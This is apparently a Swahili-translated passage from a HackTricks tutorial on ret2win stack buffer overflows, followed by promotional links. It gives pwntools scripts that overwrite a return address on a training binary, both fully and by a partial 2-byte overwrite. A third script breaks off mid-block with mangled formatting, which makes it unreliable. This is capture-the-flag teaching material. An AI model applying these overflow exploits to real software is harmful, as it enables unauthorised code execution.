from pwn import*# Configurationbinary_name ='./ret2win'p =process(binary_name)# Prepare the payloadoffset =72ret2win_addr =p64(0x00000000004006c4)payload =b'A'* offset + ret2win_addr# Send the payloadp.send(payload)# Check responseprint(p.recvline())p.close()
Kando ya-1
Kwa kweli hii itakuwa zaidi kama kando-ya-2 katika PC iliyohifadhiwa kwenye steki. Badala ya kubadilisha anwani zote za kurudi, tutabadilisha tu herufi 2 za mwisho na 0x06c4.
from pwn import*# Configurationbinary_name ='./ret2win'p =process(binary_name)# Prepare the payloadoffset =72ret2win_addr =p16(0x06c4)payload =b'A'* offset + ret2win_addr# Send the payloadp.send(payload)# Check responseprint(p.recvline())p.close()
Bila kuvuja hatujui anwani sahihi ya kazi ya kushinda lakini tunaweza kujua mbali ya kazi kutoka kwa binary na kujua kwamba anwani ya kurudi tunayobadilisha tayari inaelekeza kwa anwani karibu, ni rahisi kuvuja mbali hadi kwa kazi ya ushindi (0x7d4) katika kesi hii na kutumia mbali hiyo tu:
```python from pwn import *
Configuration
binary_name = './ret2win' p = process(binary_name)
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>